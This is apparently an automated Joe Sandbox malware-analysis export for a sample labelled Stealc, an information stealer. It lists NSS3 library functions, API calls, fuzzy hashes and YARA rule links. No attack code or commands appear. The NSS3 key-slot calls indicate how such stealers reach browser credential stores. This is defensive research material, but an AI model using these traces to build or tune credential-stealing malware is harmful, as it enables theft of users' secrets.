Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 3646ae07785b3b0a84919e80552237d1b5284922df8294e851df26f9e8735839
Instruction ID: 44b65519c8a2b472cabc444bebd39a84a81f9f1de1c88238144686ae505eb53b
Opcode Fuzzy Hash: 3646ae07785b3b0a84919e80552237d1b5284922df8294e851df26f9e8735839
Instruction Fuzzy Hash: A23134B1A4C25A8BC720CF69CAD4ABBBBF1AF41314B098994EA485BF41D331EC04C7D1

Function 6C880DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C880BDE), ref: 6C880DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C880BDE), ref: 6C880DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C880BDE), ref: 6C880DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C880BDE), ref: 6C880E32

Strings

%s incr => %d (find lib), xrefs: 6C880E2D

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 6b7fd339021b6988a23b82113a40718751a31ec5961487d64aba599e93bc5404
Instruction ID: 6b5e4f852e4e6aba65a64edfb9f0194adcc24e370929ef7f5e0d55a71878d4c1
Opcode Fuzzy Hash: 6b7fd339021b6988a23b82113a40718751a31ec5961487d64aba599e93bc5404
Instruction Fuzzy Hash: 48012472702614AFEB208F64EC49E17B3ACEF45A0AB15482DE909D3A41E761FC1486E1

Function 6C829C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C829CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C829D45
EnterCriticalSection.KERNEL32(?), ref: 6C829D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C829DDE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a90b23c899052a2ede94830af132ec1bad5d6f16338873d17a8d7e82b389aa2f
Instruction ID: 15217205369977b5bf19f2442a9bcd7b06715f181dce16a5bb270a9a3b7424a0
Opcode Fuzzy Hash: a90b23c899052a2ede94830af132ec1bad5d6f16338873d17a8d7e82b389aa2f
Instruction Fuzzy Hash: 2EA18E7170C200CBEB68AF28EA8D77A3775AF4B315F28092DD41647A44DB3D9985CBC2

Function 6C93DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C93DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C93DE77

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 06b1dc23b4faed387f7243178022a1441a44f4b42f85bbb0f7d398d41fa46cc9
Instruction ID: 48f5f7822fc4840fa4dc938573ef1e7cff6d3a14717d3e12f6c82141cf50afcb
Opcode Fuzzy Hash: 06b1dc23b4faed387f7243178022a1441a44f4b42f85bbb0f7d398d41fa46cc9
Instruction Fuzzy Hash: 53717772A14324CFDB20CF9AC9D068ABBB8BF59718F25916DD8596B742D770E901CF80

Function 6C8BBE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C8BBF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BBF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C899F71,?,?,00000000), ref: 6C8BBF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C8BBFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8BC014

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 2e58f5bf21ff5a647358c6a6138307a8f7e8dd942602a8976c5237397e4004bc
Instruction ID: 4d68b15fc95f6fad956da17467ec3a62287a4165a5e1fc242be817e69d54420b
Opcode Fuzzy Hash: 2e58f5bf21ff5a647358c6a6138307a8f7e8dd942602a8976c5237397e4004bc
Instruction Fuzzy Hash: 0941E571A016059BEB20CE6ADE80BBB77B9AF45208F104938E819F7B41FB31D905CBD1

Function 6C88EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C88EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C88EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C88EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88EEEB
free.MOZGLUE(?), ref: 6C88EEF6

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 2ca90ef857debaf02f80526475d437d5570a818d9006134c54e7d2e23f55200b
Instruction ID: f56db6dca8b92d16d8b412987cd21737ea28f34d5140c7ebb4deb4a1b3f847a3
Opcode Fuzzy Hash: 2ca90ef857debaf02f80526475d437d5570a818d9006134c54e7d2e23f55200b
Instruction Fuzzy Hash: 1831F5B56056149BEB309F2CDD44B667BB4FB46304F240928E89A87E51D731E814CBF1

Function 6C8D1EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6C8B6295,?,00000000,00000000,00000001,6C8D2653,?), ref: 6C8D1ECB

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

TlsGetValue.KERNEL32(?,00000001,?,?,6C8B6295,?,00000000,00000000,00000001,6C8D2653,?), ref: 6C8D1EF1
EnterCriticalSection.KERNEL32(?), ref: 6C8D1F01
PR_SetError.NSS3(00000000,00000000), ref: 6C8D1F39

Part of subcall function 6C8DFE20: TlsGetValue.KERNEL32(6C8B5ADC,?,00000000,00000001,?,?,00000000,?,6C8ABA55,?,?), ref: 6C8DFE4B
Part of subcall function 6C8DFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8DFE5F

PR_Unlock.NSS3(?), ref: 6C8D1F67

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID:
API String ID: 704537481-0
Opcode ID: 9b29378026e954e8526c61841dd34724d79c899a997f20e8651fa0773128f067
Instruction ID: 02b24189917268d656a595c904419dfb06dbd9be8f7541234f3ea0cc8e15b75f
Opcode Fuzzy Hash: 9b29378026e954e8526c61841dd34724d79c899a997f20e8651fa0773128f067
Instruction Fuzzy Hash: 33215775A042059BEB20AE29ED40F9A3769EF51378F1A0920FC0887B01EB30F950C7E2

Function 6C891DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C891E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C891E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C891E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C891E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C891EAD

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 3e6375312978a1f7302b2210da2c2c727648e232005698fb2dbc57c1966d9efd
Instruction ID: eb4acbacae803de5a7af1a085a7f3fe209b32b6c75ef63de0bd21ebf295c3027
Opcode Fuzzy Hash: 3e6375312978a1f7302b2210da2c2c727648e232005698fb2dbc57c1966d9efd
Instruction Fuzzy Hash: BD212872E08328A7D7108E6CDD40B8F73989B94369F144A38ED5D57780E730D90987E2

Function 6C89AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000,00000000), ref: 6C89ADA7

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000,00000000), ref: 6C89ADB4

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C893FFF,?,?,?,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000), ref: 6C89ADD5

Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9B94B0,?,?,?,?,?,?,?,?,6C893FFF,00000000,?), ref: 6C89ADEC

Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C893FFF), ref: 6C89AE3C

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: f99a7ddfe746addf41d98cee02000eda266862e2162c3794b5fdb8ed6a484a8a
Instruction ID: dd6e9bb11548baf037479eccbd56ee2037af5c80446ea0638b88663cb8dc2a34
Opcode Fuzzy Hash: f99a7ddfe746addf41d98cee02000eda266862e2162c3794b5fdb8ed6a484a8a
Instruction Fuzzy Hash: D7113B71E003196BE7209B6D9D40BFF73B8DFA524DF044A38EC1A96741FB21E55982E2

Function 6C8B8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EA2

Part of subcall function 6C8DF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C8DF854
Part of subcall function 6C8DF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C8DF868
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C8DF882
Part of subcall function 6C8DF820: free.MOZGLUE(04C483FF,?,?), ref: 6C8DF889
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C8DF8A4
Part of subcall function 6C8DF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C8DF8AB
Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C8DF8C9
Part of subcall function 6C8DF820: free.MOZGLUE(280F10EC,?,?), ref: 6C8DF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EC3
TlsGetValue.KERNEL32(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8B8EF1
PR_Unlock.NSS3 ref: 6C8B8F20

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: dff8dde16c04da262562c17d17c2c61a08d84de537761cf119aea9ec8282b884
Instruction ID: 353e117ceb9e9d0a150e6cbccd593907c2f1317793eaf543dcc7a5cd6e546c3d
Opcode Fuzzy Hash: dff8dde16c04da262562c17d17c2c61a08d84de537761cf119aea9ec8282b884
Instruction Fuzzy Hash: B9218D709097069FD710AF29D284199BBF0FF48318F05496EEC98ABB41D730E854CBD2

Function 6C8BCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C8D1E10: TlsGetValue.KERNEL32 ref: 6C8D1E36
Part of subcall function 6C8D1E10: EnterCriticalSection.KERNEL32(?,?,?,6C8AB1EE,2404110F,?,?), ref: 6C8D1E4B
Part of subcall function 6C8D1E10: PR_Unlock.NSS3 ref: 6C8D1E76

free.MOZGLUE(?,6C8BD079,00000000,00000001), ref: 6C8BCDA5
PK11_FreeSymKey.NSS3(?,6C8BD079,00000000,00000001), ref: 6C8BCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C8BD079,00000000,00000001), ref: 6C8BCDCF
DeleteCriticalSection.KERNEL32(?,6C8BD079,00000000,00000001), ref: 6C8BCDE2
free.MOZGLUE(?), ref: 6C8BCDE9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 08878689964513cfbe9f9792303e8059c79189e759ef1994386074fc8e52f51a
Instruction ID: 523b6874fe96a8a48ff456f26931a255540a5edaa2b0a0a6729bb21b218763e1
Opcode Fuzzy Hash: 08878689964513cfbe9f9792303e8059c79189e759ef1994386074fc8e52f51a
Instruction Fuzzy Hash: 781106B6B00111BBDF20AE64ED44996BB3CFF0825A7140931F918A7E02D731F424C7E1

Function 6C922CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C922CEC

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PR_EnterMonitor.NSS3(?), ref: 6C922D02
PR_EnterMonitor.NSS3(?), ref: 6C922D1F
PR_ExitMonitor.NSS3(?), ref: 6C922D42
PR_ExitMonitor.NSS3(?), ref: 6C922D5B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 02e17457790405f85a475d24a792c292d57b7781e0bd479cfcefb85f38ab3c35
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: C701E5F19206009BE7309E29FC40BA7B3A5EB61328F000535E89D86710D736E829C792

Function 6C922D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C922D9C

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PR_EnterMonitor.NSS3(?), ref: 6C922DB2
PR_EnterMonitor.NSS3(?), ref: 6C922DCF
PR_ExitMonitor.NSS3(?), ref: 6C922DF2
PR_ExitMonitor.NSS3(?), ref: 6C922E0B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: e949265558694dc42a7f16ad1a1d7ed4c59a49551b0c9664606cd61abcb153cc
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 0F01A5B5920A009BEB309E29FC01BD7B7A5EB61328F400535E89D86B14D736E8258692

Function 6C8BAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C8A3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8BAE42), ref: 6C8A30AA
Part of subcall function 6C8A3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8A30C7
Part of subcall function 6C8A3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8A30E5
Part of subcall function 6C8A3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8A3116
Part of subcall function 6C8A3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8A312B
Part of subcall function 6C8A3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8A3154
Part of subcall function 6C8A3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C8999FF,?,?,?,?,?,?,?,?,?,6C892D6B,?), ref: 6C8BAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C8999FF,?,?,?,?,?,?,?,?,?,6C892D6B,?), ref: 6C8BAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C892D6B,?,?,00000000), ref: 6C8BAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C892D6B,?,?,00000000), ref: 6C8BAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C892D6B,?,?), ref: 6C8BAEA3
